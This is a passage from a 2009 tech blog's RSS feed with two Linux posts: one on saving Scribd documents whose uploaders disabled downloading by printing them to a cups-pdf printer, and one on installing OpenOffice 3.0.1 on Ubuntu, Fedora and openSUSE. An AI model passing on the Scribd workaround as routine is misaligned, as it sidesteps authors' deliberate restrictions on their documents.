		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[opensuse]]></category>
		<category><![CDATA[cups-pdf]]></category>
		<category><![CDATA[jaunty]]></category>
		<category><![CDATA[karmic]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[pdf printer]]></category>
		<category><![CDATA[scribd]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=278</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div class='dd_post_share'><div class='dd_buttons'><div class='dd_button'><script src='http://widgets.digg.com/buttons.js' type='text/javascript'></script><a class='DiggThisButton DiggMedium' href='http://digg.com/submit?url=http://hydtechblog.com/2009/03/17/scribd/&amp;title='How+To+save+documents+from+Scribd+when+disabled+by+user+with+Ubuntu+Intrepid+or+Jaunty'></a></div><div class='dd_button'><iframe src='http://api.tweetmeme.com/button.js?url=http://hydtechblog.com/2009/03/17/scribd/&amp;source=&amp;style=normal' height='61' width='50' frameborder='0' scrolling='no'></iframe></div></div></div><div style='clear:both'></div><p>Some users disable the option to download a document from scribd but the option to print is still available.  We can use this to our advantage and save the document by printing the file to PDF.</p>
<p><a href="http://hydtechblog.com/2009/03/17/how-to-print-to-pdf-in-ubuntu-intrepid-ibex-and-jaunty-jackalope/">In Ubuntu, we need to install cups-pdf to create a postscript printer.  Check my previous post here for a tutorial.</a></p>
<p>After installing the PDF printer, go to the document you want to save on scribd.  Select more -&gt; Print</p>
<p><img class="aligncenter size-full wp-image-279" title="scribd1" src="http://hydtech.files.wordpress.com/2009/03/scribd1.png" alt="scribd1" width="510" height="382" /></p>
<p>Select the PDF printer and hit print.  and wait&#8230;..<a href="http://hydtechblog.com">.</a>&#8230;&#8230;&#8230;. this can take upto 10-15 minutes depending on how big the file is.</p>
<p><img class="aligncenter size-full wp-image-280" title="scribd2" src="http://hydtech.files.wordpress.com/2009/03/scribd2.png" alt="scribd2" width="510" height="382" /></p>
<p>Check the print status.  6 minutes and still printing&#8230;&#8230;</p>
<p><img src="http://hydtech.files.wordpress.com/2009/03/scribd3.png" alt="scribd3" title="scribd3" width="510" height="382" class="aligncenter size-full wp-image-281" /></p>
<p>When done, the file will be saved in the PDF folder we created and will be called _stdin_.pdf</p>
<p><img src="http://hydtech.files.wordpress.com/2009/03/scribd4.png" alt="scribd4" title="scribd4" width="510" height="382" class="aligncenter size-full wp-image-282" /></p>
<!-- Social Buttons Generated by Digg Digg plugin, 
    Author : Yong Mook Kim
    Website : http://www.mkyong.com/blog/digg-digg-wordpress-plugin/ --><img src="http://hydtechblog.com/?ak_action=api_record_view&id=278&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/03/17/scribd/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>How to fresh install OpenOffice 3.0.1 on Ubuntu 8.10 Intrepid, 9.04 Jaunty, Fedora 10 and openSuse 11</title>
		<link>http://hydtechblog.com/2009/02/24/how-to-fresh-install-openoffice-301-on-ubuntu-810-intrepid/</link>
		<comments>http://hydtechblog.com/2009/02/24/how-to-fresh-install-openoffice-301-on-ubuntu-810-intrepid/#comments</comments>
		<pubDate>Tue, 24 Feb 2009 01:51:44 +0000</pubDate>
		<dc:creator>HydTech</dc:creator>
				<category><![CDATA[Linux (Ubuntu)]]></category>
		<category><![CDATA[fedora]]></category>
		<category><![CDATA[opensuse]]></category>
		<category><![CDATA[intrepid]]></category>
		<category><![CDATA[jaunty]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[openoffice]]></category>
		<category><![CDATA[openoffice 3.0.1 ubuntu intrepid ibex fresh clean install]]></category>
		<category><![CDATA[ubuntu]]></category>

		<guid isPermaLink="false">http://hydtechblog.com/?p=226</guid>
		<description><![CDATA[]]></description>
			<content:encoded><![CDATA[<div class='dd_post_share'><div class='dd_buttons'><div class='dd_button'><script src='http://widgets.digg.com/buttons.js' type='text/javascript'></script><a class='DiggThisButton DiggMedium' href='http://digg.com/submit?url=http://hydtechblog.com/2009/02/24/how-to-fresh-install-openoffice-301-on-ubuntu-810-intrepid/&amp;title='How+to+fresh+install+OpenOffice+3.0.1+on+Ubuntu+8.10+Intrepid%2C+9.04+Jaunty%2C+Fedora+10+and+openSuse+11'></a></div><div class='dd_button'><iframe src='http://api.tweetmeme.com/button.js?url=http://hydtechblog.com/2009/02/24/how-to-fresh-install-openoffice-301-on-ubuntu-810-intrepid/&amp;source=&amp;style=normal' height='61' width='50' frameborder='0' scrolling='no'></iframe></div></div></div><div style='clear:both'></div><p><strong>Instructions for Ubuntu:</strong></p>
<p>Yesterday I noticed that the menu on my OpenOffice had some weird characters.  I finally figured out that some of the system fonts in Ubuntu are not compatible with OO.  I managed to change the fonts back by going to System -&gt; Preferences -&gt; Appearance -&gt; Fonts.  But it was too late.  During the process I upgraded, uninstalled the whole program and reinstalled it back again<a href="http://hydtechblog.com">.</a> For this process, I used synaptic package manager to find everything that said openoffice and marked it for complete removal.</p>
<p><img class="aligncenter size-full wp-image-228" title="remove OpenOffice" src="http://hydtech.files.wordpress.com/2009/02/oo_removal.png" alt="remove OpenOffice" width="510" height="382" /></p>
<p>I could have also opened up terminal and typed:<br />
<code>sudo apt-get remove openoffice*.*</code></p>
<p>Then, I went to openoffice.org and downloaded the .deb file for 3.0.1 (OOo_3.0.1_LinuxIntel_install_en-US_deb.tar.gz) and extracted it to the desktop. Then I typed:<br />
<code>sudo dpkg -i ~/Desktop/OOO300_m15_native_packed-1_en-US.9379/DEBS/*.deb</code><br />
<img class="aligncenter size-full wp-image-230" title="install_office" src="http://hydtech.files.wordpress.com/2009/02/install_office.png" alt="install_office" width="510" height="382" /></p>
<p>dpkg is a tool to install, build, remove and manage Debian GNU/Linux packages<a href="http://www.hydtechblog.com">.</a> The -i option is used to install a file or in this case, several files.  We selected *.deb which means select all the files with a .deb extension and install them.  We could have alternatively double clicked each .deb package and installed it separately, but the command line is a much more powerful option.</p>
<p>Next, to install the last package stored in a different folder, I typed:<br />
<code>sudo dpkg -i ~/Desktop/OOO300_m15_native_packed-1_en-US.9379/DEBS/desktop-integration/openoffice.org3.0-debian-menus_3.0-9376_all.deb</code><br />
<img class="aligncenter size-full wp-image-231" title="install_office2" src="http://hydtech.files.wordpress.com/2009/02/install_office2.png" alt="install_office2" width="510" height="382" /></p>
<p>I believe I could have used the &#8211;recursive or -R option and specified the directory, which would have installed all the packages in the folder including all the sub-folders.</p>
<p>That&#8217;s all it took.</p>
<p><strong>Instructions for Fedora and openSuse: </strong></p>
<p>Goto openoffice.org and Download the rpm in tar.gz format onto the Desktop</p>
<p>open up terminal, become root and untar the file:<br />
<code>su<br />
(enter password)<br />
tar -xvf /home/black/Desktop/OOo_3.0.1_LinuxIntel_install_wJRE_en-US.tar.gz</code><br />
<img class="aligncenter size-full wp-image-317" title="oo1" src="http://hydtech.files.wordpress.com/2009/02/oo1.png" alt="oo1" width="510" height="382" /><br />
cd into the directory:<br />
<code>cd OOO300_m15_native_packed-1_en-US.9379/</code><br />
<img class="aligncenter size-full wp-image-318" title="oo2" src="http://hydtech.files.wordpress.com/2009/02/oo2.png" alt="oo2" width="510" height="382" /><br />
setup:<br />
<code>./setup</code><br />
<img class="aligncenter size-full wp-image-319" title="oo3" src="http://hydtech.files.wordpress.com/2009/02/oo3.png" alt="oo3" width="510" height="382" /><br />
follow install directions:<br />
<img class="aligncenter size-full wp-image-320" title="oo4" src="http://hydtech.files.wordpress.com/2009/02/oo4.png" alt="oo4" width="510" height="382" /></p>
<p><img class="aligncenter size-full wp-image-321" title="oo5" src="http://hydtech.files.wordpress.com/2009/02/oo5.png" alt="oo5" width="510" height="382" /></p>
<p>[digg=http://digg.com/linux_unix/Tutorial_How_to_Install_OpenOffice_on_Ubuntu_Fedora_openSuse]</p>
<p>Yatta !</p>
<!-- Social Buttons Generated by Digg Digg plugin, 
    Author : Yong Mook Kim
    Website : http://www.mkyong.com/blog/digg-digg-wordpress-plugin/ --><img src="http://hydtechblog.com/?ak_action=api_record_view&id=226&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://hydtechblog.com/2009/02/24/how-to-fresh-install-openoffice-301-on-ubuntu-810-intrepid/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>
